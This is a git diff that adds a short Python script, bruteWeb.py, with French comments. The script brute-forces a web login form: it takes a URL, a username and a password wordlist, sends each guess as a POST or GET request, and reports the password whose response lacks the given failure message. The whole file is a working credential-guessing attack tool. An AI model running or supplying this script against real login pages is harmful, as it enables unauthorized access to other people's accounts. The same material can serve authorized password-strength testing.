diff options
Diffstat (limited to 'bruteforce/bruteWeb.py')
| -rw-r--r-- | bruteforce/bruteWeb.py | 37 |
1 files changed, 37 insertions, 0 deletions
diff --git a/bruteforce/bruteWeb.py b/bruteforce/bruteWeb.py new file mode 100644 index 0000000..e75cde1 --- /dev/null +++ b/bruteforce/bruteWeb.py @@ -0,0 +1,37 @@ +import sys +import requests + +def bruteforce(method,url,username,password,error_msg): + if method == "post": + reponse=requests.post(url,data={ + "username":username, + "password":password + }) + elif method == "get": + reponse=requests.get(url,params={ + "username":username, + "password":password + }) + + if error_msg in reponse.text: + #print("erreur : ",password) + pass + else: + print("trouvé : ",password) + return True + +if __name__ == "__main__": + method = sys.argv[1] + url = sys.argv[2] + username = sys.argv[3] + dico = sys.argv[4] + error_msg= sys.argv[5] + with open(dico, 'r') as wordlist: + for ligne in wordlist.readlines(): + # le fichier nmap.lst à des commentaires en début de fichier + if ligne[0] != "#": + password=ligne.strip() + if bruteforce(method,url,username,password,error_msg)==True: + sys.exit() + + |